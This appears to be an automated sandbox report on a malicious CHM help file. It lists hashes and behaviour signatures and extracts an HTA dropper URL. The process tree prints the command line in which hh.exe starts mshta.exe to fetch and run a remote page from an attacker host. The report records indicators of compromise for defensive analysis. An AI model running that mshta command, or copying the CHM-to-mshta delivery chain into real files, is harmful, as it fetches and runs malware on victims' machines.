60804ebbb655ea68b9e0bce63d5edbd03e0f75837f44539fec28dc12d44b5ba5 | Triage

Analysis

max time kernel
135s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
12-04-2023 02:39

Sharing

Report Analysis Logs

General

Target

6bd63cf73cab3305686f2ee41d69bd42.chm
Size

14KB
MD5

6bd63cf73cab3305686f2ee41d69bd42
SHA1

d87b95ffdde89d5302d006e5f1c89db960e34f08
SHA256

60804ebbb655ea68b9e0bce63d5edbd03e0f75837f44539fec28dc12d44b5ba5
SHA512

76d5fcd3924cef67df749d5a1162ada84cf9a0dbd74e7e98ebfe45f6b99fcd3b9fc51526be8cb2ef8f0b37d07762e84c1f7b9088641cc26fef266894235e716f
SSDEEP

192:RC6DoFThrH5pgpkZf4dDnriElnycJZPgL/:RC6chHIpkt45riEAcJZIz

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://attiferstudio.com/install.bak/sony/1.html

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	1056	mshta.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4368	hh.exe
4368	hh.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4368 wrote to memory of 1056	4368	hh.exe	85
PID 4368 wrote to memory of 1056	4368	hh.exe	85

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\6bd63cf73cab3305686f2ee41d69bd42.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4368
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/1.html ,
  2⤵
  - Blocklisted process makes network request
  PID:1056

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads